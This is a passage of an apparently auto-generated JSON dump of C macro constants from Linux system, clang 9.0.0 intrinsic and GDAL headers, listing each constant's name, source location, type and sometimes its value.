"ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:46:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__LEAF", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:45:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__THROW", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:55:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__THROWNL", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:56:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__VBMIVLINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmivlintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_psubd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1522:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_psubsb", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1523:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_paddusw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1519:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__AVXINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_psubb", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1520:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_psubw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1521:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_psubusw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1526:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_pmaddwd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1527:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_pmulhw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1528:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_psubsw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1524:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_psubusb", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1525:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__CLWBINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/clwbintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_psllwi", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1531:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_pslld", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1532:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_pmullw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1529:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_psllw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1530:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_psllqi", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1535:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_psraw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1536:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_psrawi", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1537:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_pslldi", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1533:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_psllq", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1534:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_psrlw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1540:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_psrlwi", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1541:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_psrad", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1538:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_psradi", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1539:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_psrlqi", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1545:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_pand", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1546:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__AVX512DQINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512dqintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_psrld", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1542:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_psrlq", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1544:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_psrldi", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1543:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_pcmpeqb", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1550:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__AVX512VBMI2INTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_pcmpeqw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1551:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_pandn", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1547:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_pxor", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1549:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_por", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1548:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_pcmpgtw", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1554:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_pcmpgtd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1555:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_pcmpeqd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1552:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_m_pcmpgtb", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:1553:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__attribute_deprecated__", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:251:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__attribute_noinline__", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:243:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__XMMINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:11:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__MM_MALLOC_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm_malloc.h:11:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_CMP_FALSE_OS", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1587:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 27 }, { "tag": "const", "name": "_CMP_NGT_UQ", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1586:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 26 }, { "tag": "const", "name": "_CMP_NGE_UQ", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1585:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 25 }, { "tag": "const", "name": "_CMP_TRUE_US", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1591:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 31 }, { "tag": "const", "name": "_CMP_GT_OQ", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1590:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 30 }, { "tag": "const", "name": "_CMP_GE_OQ", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1589:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 29 }, { "tag": "const", "name": "_CMP_NEQ_OS", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1588:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 28 }, { "tag": "const", "name": "__AVX512VLVNNIINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvnniintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__INVPCIDINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/invpcidintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__PTWRITEINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ptwriteintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_AVX512VP2INTERSECT_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vp2intersectintrin.h:29:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__XOPINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__PCONFIGINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/pconfigintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_MM_EXCEPT_OVERFLOW", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2937:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "_MM_EXCEPT_UNDERFLOW", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2938:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 16 }, { "tag": "const", "name": "_MM_EXCEPT_DENORM", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2935:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "_MM_EXCEPT_DIV_ZERO", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2936:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "__SGXINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/sgxintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_MM_EXCEPT_INVALID", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2934:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__PCONFIG_KEY_PROGRAM", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/pconfigintrin.h:17:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_MM_ALIGN16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2930:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__AVX512VNNIINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vnniintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__WAITPKGINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/waitpkgintrin.h:14:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_MOVDIRINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/movdirintrin.h:14:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__FMA4INTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__RDSEEDINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/rdseedintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__AVX512VPOPCNTDQVLINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vpopcntdqvlintrin.h:16:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__CLDEMOTEINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/cldemoteintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__AVX512VPOPCNTDQINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vpopcntdqintrin.h:16:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__WBNOINVDINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/wbnoinvdintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__AMMINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/ammintrin.h:11:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_BITS_POSIX1_LIM_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:25:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_AIO_LISTIO_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:32:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "__AVX512BITALGINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bitalgintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "LLONG_MIN", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/limits.h:83:9", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 }, "value": -9223372036854775808 }, { "tag": "const", "name": "LLONG_MAX", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/limits.h:82:9", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 }, "value": 9223372036854775807 }, { "tag": "const", "name": "ULLONG_MAX", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/limits.h:84:9", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 }, "value": 18446744073709551615 }, { "tag": "const", "name": "MB_LEN_MAX", "ns": 0, "location": "/usr/include/limits.h:32:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 16 }, { "tag": "const", "name": "_LIBC_LIMITS_H_", "ns": 0, "location": "/usr/include/limits.h:23:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_GCC_LIMITS_H_", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/limits.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_POSIX_CHILD_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:42:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 25 }, { "tag": "const", "name": "_POSIX_AIO_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:35:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_ARG_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:38:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4096 }, { "tag": "const", "name": "_MM_HINT_NTA", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2073:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_MM_HINT_T2", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2072:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_MM_HINT_ET1", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2069:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 6 }, { "tag": "const", "name": "_MM_HINT_T0", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2070:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3 }, { "tag": "const", "name": "_MM_HINT_T1", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2071:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "__CLANG_LIMITS_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/limits.h:10:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__AVX512CDINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512cdintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_MM3DNOW_H_INCLUDED", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mm3dnow.h:11:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__PRFCHWINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/prfchwintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_AVX512VLVP2INTERSECT_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvp2intersectintrin.h:29:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__ENQCMDINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/enqcmdintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_VA_LIST", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/stdarg.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SIZE_T", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/stddef.h:44:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "NULL", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/stddef.h:89:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__STDARG_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/stdarg.h:11:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__need___va_list", "ns": 0, "location": "/usr/include/stdio.h:35:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__STDDEF_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/stddef.h:19:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_DELAYTIMER_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:126:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 26 }, { "tag": "const", "name": "_SC_MQ_OPEN_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:128:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 27 }, { "tag": "const", "name": "_SC_AIO_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:122:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 24 }, { "tag": "const", "name": "_SC_AIO_PRIO_DELTA_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:124:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 25 }, { "tag": "const", "name": "_SC_PAGESIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:134:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 30 }, { "tag": "const", "name": "_SC_PAGE_SIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:135:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 30 }, { "tag": "const", "name": "_SC_MQ_PRIO_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:130:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 28 }, { "tag": "const", "name": "_SC_VERSION", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:132:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 29 }, { "tag": "const", "name": "_SC_MEMLOCK_RANGE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:110:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 18 }, { "tag": "const", "name": "_SC_MEMORY_PROTECTION", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:112:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 19 }, { "tag": "const", "name": "_SC_FSYNC", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:104:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 15 }, { "tag": "const", "name": "_SC_MAPPED_FILES", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:106:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 16 }, { "tag": "const", "name": "_SC_MEMLOCK", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:108:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 17 }, { "tag": "const", "name": "_SC_SHARED_MEMORY_OBJECTS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:118:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 22 }, { "tag": "const", "name": "_SC_AIO_LISTIO_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:120:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 23 }, { "tag": "const", "name": "_SC_MESSAGE_PASSING", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:114:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 20 }, { "tag": "const", "name": "_SC_SEMAPHORES", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:116:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 21 }, { "tag": "const", "name": "_SC_REALTIME_SIGNALS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:92:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 9 }, { "tag": "const", "name": "GDAL_DATA_COVERAGE_STATUS_EMPTY", "ns": 0, "location": "/usr/include/gdal/gdal.h:928:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "_SC_PRIORITY_SCHEDULING", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:94:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 10 }, { "tag": "const", "name": "_SC_JOB_CONTROL", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:88:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 7 }, { "tag": "const", "name": "GDAL_DATA_COVERAGE_STATUS_DATA", "ns": 0, "location": "/usr/include/gdal/gdal.h:921:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "_SC_SAVED_IDS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:90:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "GDAL_DATA_COVERAGE_STATUS_UNIMPLEMENTED", "ns": 0, "location": "/usr/include/gdal/gdal.h:915:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SC_PRIORITIZED_IO", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:100:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 13 }, { "tag": "const", "name": "_SC_SYNCHRONIZED_IO", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:102:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 14 }, { "tag": "const", "name": "GMF_PER_DATASET", "ns": 0, "location": "/usr/include/gdal/gdal.h:904:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "_SC_TIMERS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:96:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 11 }, { "tag": "const", "name": "GMF_NODATA", "ns": 0, "location": "/usr/include/gdal/gdal.h:910:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "_SC_ASYNCHRONOUS_IO", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:98:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 12 }, { "tag": "const", "name": "GMF_ALPHA", "ns": 0, "location": "/usr/include/gdal/gdal.h:907:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "_SC_ARG_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:74:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "GMF_ALL_VALID", "ns": 0, "location": "/usr/include/gdal/gdal.h:901:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SC_CHILD_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:76:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 